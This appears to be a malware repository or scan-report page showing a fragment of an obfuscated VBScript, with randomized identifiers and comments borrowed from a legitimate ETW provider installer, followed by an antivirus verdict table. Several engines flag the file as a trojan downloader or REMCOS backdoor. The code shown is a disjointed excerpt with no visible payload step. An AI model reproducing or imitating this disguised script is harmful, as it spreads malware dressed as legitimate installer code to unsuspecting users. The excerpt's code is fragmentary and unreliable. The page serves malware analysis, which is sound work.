FixManifest = wanMX
End Function
'''''''''''''''''''''' rgnky ''''''''''''''''''''''
' Print usage baSTo
' Install Providers
' Uninstall Providers
Function kycEE
' If this is msi mode, uninstall failures are not fatal
If False = oPVGo Then
On Error Resume Next
End If
GbTHa = Session.TargetPath("ETWProviders")
EVhDM( GetRef("ipiCN") )
On Error Goto 0
End Function
' Enumerates over the provider manifests
Function EVhDM( YWQyi )
Dim sCOEt, GXnlH, File
' Remove possible trailing backslash
If Right(GbTHa, 1) = "\" Then
GbTHa = Left(GbTHa, Len(GbTHa) - 1)
End If
' Uninstall an ETW Provider
' Create a fixed-up copy of a provider manifest
Dim lpzfh, dtywx, JoGki, ASaBf
Dim wanMX, messageFileName, jZqrl
Set lpzfh = CreateObject("msxml2.DOMDocument.3.0")
Antivirus Signature
Bkav Clean
Lionic Clean
tehtris Clean
Cynet Clean
CTX Clean
CAT-QuickHeal Clean
Skyhigh Clean
ALYac Clean
Malwarebytes Clean
Zillya Clean
Sangfor Clean
K7AntiVirus Clean
K7GW Clean
Baidu Clean
VirIT Trojan.VBS.Agent.FYS
Symantec Scr.Malcode!gen
ESET-NOD32 PowerShell/TrojanDownloader.Agent.GBO
TrendMicro-HouseCall Backdoor.VBS.REMCOS.YXEJVZ
Avast Script:SNH-gen [Trj]
ClamAV Clean
Kaspersky HEUR:Trojan.Script.Generic
BitDefender Clean
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan Clean
Tencent Win32.Trojan-Downloader.Downloader.Qgil
Sophos Clean
F-Secure Clean
DrWeb Clean
TrendMicro Backdoor.VBS.REMCOS.YXEJVZ
CMC Clean
Emsisoft Clean
huorong Trojan/PS.Encpe.i
FireEye Clean
Jiangmin Clean
Varist Clean
Avira Clean
Fortinet Clean
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Clean
Xcitium Clean
Arcabit Clean
SUPERAntiSpyware Clean
ZoneAlarm Clean
Microsoft Clean
Google Detected
AhnLab-V3 Clean
Acronis Clean
McAfee Clean
VBA32 Clean
Zoner Clean
Rising Downloader.Agent/VBS!1.104B2 (CLASSIC)
Yandex Clean
Ikarus Trojan-Downloader.PowerShell.Agent
MaxSecure Clean
GData Clean
AVG Script:SNH-gen [Trj]
Panda Clean
alibabacloud Clean
No IRMA results available.